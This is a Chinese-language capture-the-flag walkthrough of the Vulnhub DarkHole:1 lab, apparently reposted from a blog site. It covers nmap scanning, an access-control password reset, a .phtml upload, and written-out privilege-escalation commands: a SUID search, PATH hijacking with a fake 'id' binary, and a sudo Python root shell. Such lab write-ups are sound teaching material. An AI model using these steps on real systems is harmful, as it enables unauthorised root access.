kali:192.168.111.111
靶机:192.168.111.130
信息收集
端口扫描
nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.130
访问目标web网站,注册用户
注册时尝试注册用户名为admin的用户,发现存在该用户
进入用户后台,利用burp抓包越权修改其他用户的密码
admin用户密码被修改
经过测试,phtml后缀的文件可以上传并且被当成脚本执行
提权
查找suid权限的文件
find / -perm -u=s 2> /dev/null
执行toto的同时会执行id命令
修改环境变量切换到john用户
echo '/bin/bash' > id
chmod 777 /tmp/id
export PATH=/tmp:$PATH
./toto
在john用户家目录,发现password文件存放john用户的密码
查看john用户sudo权限
修改file.py提升为root文章来源:https://www.toymoban.com/news/detail-506123.html
echo 'import os' > file.py
echo 'os.system("/bin/bash")' >> file.py
sudo -u root /usr/bin/python3 /home/john/file.py
文章来源地址https://www.toymoban.com/news/detail-506123.html
到了这里,关于Vulnhub: DarkHole:1靶机的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!